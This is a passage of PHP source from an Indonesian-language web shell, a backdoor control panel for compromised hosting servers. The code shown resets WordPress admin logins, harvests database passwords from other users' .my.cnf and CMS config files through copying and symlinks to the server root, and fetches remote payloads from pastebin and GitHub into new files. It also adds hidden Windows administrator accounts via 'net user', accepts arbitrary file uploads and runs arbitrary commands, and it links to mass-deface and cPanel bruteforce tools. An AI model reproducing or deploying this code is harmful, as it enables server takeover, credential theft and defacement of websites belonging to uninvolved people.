1304. $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';";
1305. @mysql_query($sql) ; ;
1306. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
1307. $siteurl=@mysql_fetch_array($aa) ;
1308. $siteurl=$siteurl['option_value'];
1309. $tr.="$siteurl\n";
1310. mysql_close();
1311. }
1312. }
1313. if ($tr)
1314. $filename = 'changed.txt';
1315. $fp = fopen($filename, "a+");
1316. $write = fputs($fp, $tr);
1317. fclose($fp);
1318. echo "<div class='result'>Password Changing Completed ! :)<br><br>";
1319. echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>";
1320.  
1321. }
1322. }
1323. function file_get_contents2($u){
1324. $ch = curl_init();
1325. curl_setopt($ch,CURLOPT_URL,$u);
1326. curl_setopt($ch, CURLOPT_HEADER, 0);
1327. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
1328. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
1329. $result = curl_exec($ch);
1330. return $result ;
1331. }
1332. echo "<br /><br />";
1333. die();
1334. ?>
1335. <?php }
1336. elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool'))
1337. {
1338. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1339. ?>
1340. <a href="?<?php echo "path=".$path; ?>&amp;x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
1341. Or <a href="?<?php echo "path=".$path; ?>&amp;x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
1342. Or <a href="?<?php echo "path=".$path; ?>&amp;x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
1343. <br/><br/><br/><br/><br/>
1344.  
1345. <?php
1346. die();
1347. }
1348. elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang'))
1349. {
1350. echo"<br><br>
1351. <center><b>
1352. <font face='Jolly Lodger' color='red' size='6px'>Indonesian <font color='white'> Hacker</font><br>
1353. <br>
1354.  
1355. </center>
1356. </b>";
1357. die();
1358. }
1359.  
1360.  
1361. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel'))
1362. {
1363. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1364. ?>
1365.  
1366. <a href="?<?php echo "path=".$path; ?>&amp;x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
1367. Or <a href="?<?php echo "path=".$path; ?>&amp;x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
1368. <br/><br/><br/><br/>
1369. <?php die(); ?>
1370.  
1371. <?php
1372. }
1373. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack'))
1374. {
1375. ?>
1376. <form action="?path=<?php echo $path; ?>&amp;x=cpcrack" method="post">
1377. <?php
1378.  
1379. @ini_set('display_errors',0);
1380. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1381. $ar0=explode($marqueurDebutLien, $text);
1382. $ar1=explode($marqueurFinLien, $ar0[$i]);
1383. return trim($ar1[0]);
1384. }
1385.  
1386. echo '<h1>Cpanel Finder/Cracker</h1><br/>';
1387.  
1388. echo "<center>";
1389. $d0mains = @file('/etc/named.conf');
1390. $domains = scandir("/var/named");
1391.  
1392. if ($domains or $d0mains)
1393. {
1394. $domains = scandir("/var/named");
1395. if($domains) {
1396. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1397. $count=1;
1398. $dc = 0;
1399. $list = scandir("/var/named");
1400. foreach($list as $domain){
1401. if(strpos($domain,".db")){
1402. $domain = str_replace('.db','',$domain);
1403. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1404. $dirz = '/home/'.$owner['name'].'/.my.cnf';
1405. $path = getcwd();
1406.  
1407. if (is_readable($dirz)) {
1408. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1409. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1410. $password=entre2v2($p,'password="','"');
1411. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1412. $dc++;
1413. }
1414.  
1415. }
1416. }
1417. echo '</table>';
1418. $total = $dc;
1419. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
1420. echo '</center>';
1421. }else{
1422. $d0mains = @file('/etc/named.conf');
1423. if($d0mains) {
1424. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1425. $count=1;
1426. $dc = 0;
1427. $mck = array();
1428. foreach($d0mains as $d0main){
1429. if(@eregi('zone',$d0main)){
1430. preg_match_all('#zone "(.*)"#',$d0main,$domain);
1431. flush();
1432. if(strlen(trim($domain[1][0])) >2){
1433. $mck[] = $domain[1][0];
1434. }
1435. }
1436. }
1437. $mck = array_unique($mck);
1438. $usr = array();
1439. $dmn = array();
1440. foreach($mck as $o) {
1441. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1442. $usr[] = $infos['name'];
1443. $dmn[] = $o;
1444. }
1445. array_multisort($usr,$dmn);
1446. $dt = file('/etc/passwd');
1447. $passwd = array();
1448. foreach($dt as $d) {
1449. $r = explode(':',$d);
1450. if(strpos($r[5],'home')) {
1451. $passwd[$r[0]] = $r[5];
1452. }
1453. }
1454. $l=0;
1455. $j=1;
1456. foreach($usr as $r) {
1457. $dirz = '/home/'.$r.'/.my.cnf';
1458. $path = getcwd();
1459. if (is_readable($dirz)) {
1460. copy($dirz, ''.$path.'/'.$r.'.txt');
1461. $p=file_get_contents(''.$path.'/'.$r.'.txt');
1462. $password=entre2v2($p,'password="','"');
1463. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1464. $dc++;
1465. flush();
1466. $l=$l?0:1;
1467. $j++;
1468. }
1469. }
1470. }
1471. echo '</table>';
1472. $total = $dc;
1473. echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
1474. echo '</center>';
1475.  
1476. }
1477. }else{
1478. echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
1479. }
1480.  
1481. echo "</body></html>";
1482. die();
1483. }
1484.  
1485. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1486. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////END OF CPANEL TOOLS//////////////////////////////
1487. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1488.  
1489.  
1490. elseif(isset($_GET['x']) && ($_GET['x'] == 'vn'))
1491. {
1492. ?>
1493. <form action="?path=<?php echo $path; ?>&amp;x=vn" method="post">
1494. <center><h2>Domain Viewer</h2></center><br><br>
1495. <?php
1496. function openBaseDir()
1497. {
1498. $openBaseDir = ini_get("open_basedir");
1499. if (!$openBaseDir)
1500. {
1501. $openBaseDir = '<font color="green">OFF</font>';
1502. }
1503. else
1504. {
1505. $openBaseDir = '<font color="red">ON</font>';
1506. }
1507. return $openBaseDir;
1508. }
1509.  
1510.  
1511. echo '
1512. <table width="95%" cellspacing="0" cellpadding="0" >
1513. <td height="100" align="left" >';
1514. $pg = basename(__FILE__);
1515. $safe_mode = @ini_get('safe_mode');
1516. $dir = @getcwd();
1517. ////////////////////////////////////////////////////
1518. #.htaccess
1519. @mkdir('pee',0777);
1520. @symlink("/","pee/root");
1521. $htaccss = "Options all
1522. DirectoryIndex Sux.html
1523. AddType text/plain .php
1524. AddHandler server-parsed .php
1525. AddType text/plain .html
1526. AddHandler txt .html
1527. Require None
1528. Satisfy Any";
1529.  
1530. file_put_contents("pee/.htaccess",$htaccss);
1531. $etc = file_get_contents("/etc/passwd");
1532. $etcz = explode("\n",$etc);
1533.  
1534.  
1535. ##Symlink to the ROOT :p
1536. foreach($etcz as $etz){
1537. $etcc = explode(":",$etz);
1538. error_reporting(0);
1539.  
1540. $current_dir = posix_getcwd();
1541. $dir = explode("/",$current_dir);
1542.  
1543. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1544. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1545. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1546. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1547. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
1548. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
1549. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1550. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1551. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1552. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1553. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
1554. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
1555. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
1556. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
1557. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
1558. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
1559. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
1560. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1561. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1562. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1563. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1564. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1565. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1566. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1567. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1568. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1569. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1570. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1571. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1572. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1573. }
1574. #############################
1575. if(is_readable("/var/named")){
1576. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1577. echo'<tr><td><center><b>SITE</b></center></td><td>
1578. <center><b>USER</b></center></td>
1579. <td></center><b>SYMLINK</b></center></td>';
1580. $list = scandir("/var/named");
1581. foreach($list as $domain){
1582. if(strpos($domain,".db")){
1583. $i += 1;
1584. $domain = str_replace('.db','',$domain);
1585. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1586.  
1587. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1588. <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1589. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1590. }
1591. }
1592. echo "<center>Total Domains Found: ".$i."</center><br />";
1593. }else{
1594. echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1595.  
1596. die();
1597.  
1598. ##################################
1599. error_reporting(0);
1600. $etc = file_get_contents("/etc/passwd");
1601. $etcz = explode("\n",$etc);
1602. if(is_readable("/etc/passwd")){
1603.  
1604. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1605. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1606.  
1607. $list = scandir("/var/named");
1608.  
1609. foreach($etcz as $etz){
1610. $etcc = explode(":",$etz);
1611.  
1612. foreach($list as $domain){
1613. if(strpos($domain,".db")){
1614. $domain = str_replace('.db','',$domain);
1615. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1616. if($owner['name'] == $etcc[0])
1617. {
1618. $i += 1;
1619. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1620. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1621. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1622. }}}}
1623. echo "<center>Total Domains Found: ".$i."</center><br />";}
1624.  
1625. die();
1626. ###############################
1627. if(is_readable("/etc/named.conf")){
1628. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1629. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1630. $named = file_get_contents("/etc/named.conf");
1631. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1632. foreach($domains[1] as $domain){
1633. $domain = trim($domain);
1634. $i += 1;
1635. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1636. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1637. }
1638. echo "<center>Total Domains Found: ".$i."</center><br />";
1639.  
1640. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1641.  
1642. die();
1643. ############################
1644. if(is_readable("/etc/valiases")){
1645. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1646. echo'<tr><td><center><b>SITE</b></center></td><td>
1647. <center><b>USER</b></center></td><td></center>
1648. <b>SYMLINK</b></center></td>';
1649. $list = scandir("/etc/valiases");
1650. foreach($list as $domain){
1651. $i += 1;
1652. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1653. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1654. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1655. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1656. }
1657. echo "<center>Total Domains Found: ".$i."</center><br />";
1658. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1659.  
1660. die();
1661. }
1662.  
1663. ///DUMP
1664. elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
1665. {
1666. ?>
1667. <br/><br/>
1668. <form action="?path=<?php echo $path; ?>&amp;x=dump" method="post">
1669. <?php
1670. $pilih = $_POST['pilihan'];
1671. echo'<center>
1672. <table border=1>
1673. <select class="bordergaya" align="left" name="pilihan" id="pilih">
1674. <option value="dumper">Gate 1</option>
1675. </select>
1676. <input type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';?><?php
1677. if ( $pilih == "dumper") {
1678. $files = file_get_contents("http://pastebin.com/raw/HhiURUER");
1679. file_put_contents("dumper.php",$files);
1680. echo "<script>alert('Done! Access dumper.php for processing'); hideAll();</script>";
1681. echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>";
1682. die();
1683. }
1684. echo'</td></form></tr></table>';
1685. die();
1686. }
1687.  
1688. ///menu rdp
1689. if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
1690. /* By Shor7cut */
1691. /* Interface By Putra-Attacker*/
1692. {
1693. if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
1694. {
1695. ?><br/><br/>
1696. <div id="content-left">
1697. <form action="" method="post">
1698. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1699. <tr>
1700. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
1701. </tr>
1702. <tr>
1703. <td><font class='kecew'>Username</font></td>
1704. <td><font class='kecew'> : </font></td>
1705. <td><input type="text" class="bordergaya" name="username" required></td>
1706. </tr>
1707. <tr>
1708. <td><font class='kecew'>Password</font></td>
1709. <td><font class='kecew'> : </font></td>
1710. <td><input type="text" class="bordergaya" name="password" required></td>
1711. </tr>
1712. <tr>
1713. <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
1714. </tr>
1715. </table>
1716. </form>
1717. </div>
1718. <br/>
1719. <div id="content-left">
1720. <form action="" method="post">
1721. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1722. <tr>
1723. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
1724. </tr>
1725. <tr>
1726. <td><font class='kecew'>Username</font></td>
1727. <td><font class='kecew'> : </font></td>
1728. <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
1729. </tr>
1730. <tr>
1731. <td><font class='kecew'>Password</font></td>
1732. <td><font class='kecew'> : </font></td>
1733. <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
1734. </tr>
1735. <tr>
1736. <td><font class='kecew'>Action</font></td>
1737. <td><font class='kecew'> : </font></td>
1738. <td>
1739. <select name="aksi" class="bordergaya">
1740. <option value="1">Tampilkan Username</option>
1741. <option value="2">Hapus Username</option>
1742. <option value="3">Ubah Password</option>
1743. </select>
1744. </td>
1745. </tr>
1746. <tr>
1747. <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
1748. </tr>
1749. </table>
1750. </form>
1751. <br/>
1752. </div>
1753. </center></center>
1754. <?php
1755. if($_POST['submit'])
1756. {
1757. if($_POST['kshell']=="1")
1758. {
1759. $r_user = $_POST['username'];
1760. $r_pass = $_POST['password'];
1761. $cmd_cek_user = shell_exec("net user");
1762. if(preg_match("/$r_user/", $cmd_cek_user)){
1763. echo $gaya_root.$r_user." sudah ada".$o;
1764. }else {
1765. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
1766. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
1767. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
1768. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
1769. if($cmd_add_user){
1770. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
1771. }else {
1772. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
1773. }
1774. echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
1775. if($cmd_add_groups1){
1776. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1777. }else
1778. if($cmd_add_groups2){
1779. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1780. }else
1781. if($cmd_add_groups3){
1782. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1783. }else {
1784. echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
1785. }
1786. echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
1787. echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
1788. echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
1789. }
1790.  
1791.  
1792. }
1793. else if($_POST['kshell']=="2")
1794. {
1795. echo "<style>
1796. .coeg{margin-left:30%;}
1797. </style>";
1798. if($_POST['aksi']=="1"){
1799. echo "<pre class='coeg'>".shell_exec("net user");
1800. }
1801. else if($_POST['aksi']=="2")
1802. {
1803. $username = $_POST['rusername'];
1804. $cmd_cek_user = shell_exec("net user");
1805. if (!empty($username)){
1806. if(preg_match("/$username/", $cmd_cek_user)){
1807. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
1808. if($cmd_add_user){
1809. echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu.. </font><br /><br />";
1810. echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1811. }else {
1812. echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
1813. }
1814. }else {
1815. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1816. }
1817. }else {
1818. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1819. }
1820. }
1821. else if($_POST['aksi']=="3")
1822. {
1823. echo "<style>
1824. .tengahaja{margin-left:35%}
1825. </style>";
1826. $username = $_POST['rusername'];
1827. $password = $_POST['gantipw'];
1828. $cmd_cek_user = shell_exec("net user");
1829. if (!empty($username)){
1830. if(preg_match("/$username/", $cmd_cek_user)){
1831. $cmd_add_user = shell_exec("net user ".$username."");
1832. if($cmd_add_user){
1833. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1834. }else {
1835. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
1836. }
1837. }else
1838. {
1839. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1840. }
1841. }else
1842. {
1843. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1844. }
1845. }
1846. }
1847.  
1848. }
1849. } else{
1850. echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
1851. }die();
1852. }
1853.  
1854. /*
1855. AUTO UPLOAD
1856. START HERE
1857. */
1858.  
1859. elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot'))
1860. {
1861. echo'<center><br><br><h3>File Creator [Auto upload]</h3>
1862. <table>
1863. <tr><form method="post" action="">&nbsp;<td>
1864. <select class="bordergaya" align="left" name="pilihan" id="pilih">
1865. <option value="hsphere">Bypass hSphere Shell</option>
1866. <option value="adminer">Adminer</option>
1867. </select>
1868. <input type="submit" name="submites" class="bordergaya" value="create">
1869. </td></form></tr></table><br/><br/><br/>';
1870. error_reporting(0);
1871. set_time_limit(0);
1872. $submit = $_POST ['submites'];
1873. if(isset($submit)) {
1874. $pilih = $_POST['pilihan'];
1875. ///hsphere shell
1876. if ( $pilih == 'hsphere') {
1877. $files = file_get_contents("https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php");
1878. file_put_contents("hsphere.php",$files);
1879. echo "<script>alert('Bypass hsphere shell created!'); hideAll();</script>";
1880. echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>";
1881. die();
1882. }
1883.  
1884. elseif ( $pilih == 'adminer') {
1885. getfile("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php");
1886. echo "<script>alert('adminer created!'); hideAll();</script>";
1887. echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>";
1888. die();
1889. }
1890. }die();
1891. }
1892.  
1893.  
1894. elseif(isset($_GET['x']) && ($_GET['x'] == 'korong'))
1895. {
1896. echo '<center><br /><br />
1897. <form enctype="multipart/form-data" method="POST">
1898. <input type="file" name="file" id="file" class="inputfile inputfile-4" />
1899. <label for="file">
1900. <figure>
1901. <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
1902. </figure>
1903. <span>Silahkan Pilih File</span>
1904. </label>';
1905. ?>
1906. <script type="text/javascript">
1907. /*
1908. By Osvaldas Valutis, www.osvaldas.info
1909. Available for use under the MIT License
1910. */
1911.  
1912. 'use strict';
1913.  
1914. ;( function ( document, window, index )
1915. {
1916. var inputs = document.querySelectorAll( '.inputfile' );
1917. Array.prototype.forEach.call( inputs, function( input )
1918. {
1919. var label = input.nextElementSibling,
1920. labelVal = label.innerHTML;
1921.  
1922. input.addEventListener( 'change', function( e )
1923. {
1924. var fileName = '';
1925. if( this.files && this.files.length > 1 )
1926. fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
1927. else
1928. fileName = e.target.value.split( '\\' ).pop();
1929.  
1930. if( fileName )
1931. label.querySelector( 'span' ).innerHTML = fileName;
1932. else
1933. label.innerHTML = labelVal;
1934. });
1935.  
1936. // Firefox bug fix
1937. input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' ); });
1938. input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' ); });
1939. });
1940. }( document, window, 0 ));
1941. </script>
1942. <?php
1943. echo'<br/>
1944. <input type="submit" class="tombolupil" value="Upload File!" />
1945. </form>';
1946. if(isset($_FILES['file'])){
1947. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
1948. echo '<script>alert("File Sukses Di Upload!");</script>';
1949. }else{
1950. echo '<script>alert("File Gagal Di Upload!");</script>';
1951. }
1952. }
1953. echo "</center><br /><br />";
1954. die();
1955. }
1956.  
1957. ///////////////////////////
1958.  
1959. ////////////////////////CMD////////////////////////
1960.  
1961. elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) {
1962. echo "<br/><br/><form method='post'>
1963. <font clss='rapihbanget'>Command :</font>
1964. <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
1965. </form>";
1966. if($_POST['execmd']) {
1967. echo "<pre>".exe($_POST['cmd'])."</pre>";
1968. }
1969. }
1970.  
1971. ///////////////////////////////////////////////////
1972.  
1973. //////////////////////////////////////////////////
1974. //////////////////////////////////////////////////
1975. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls'))
1976. {
1977. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
1978. <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
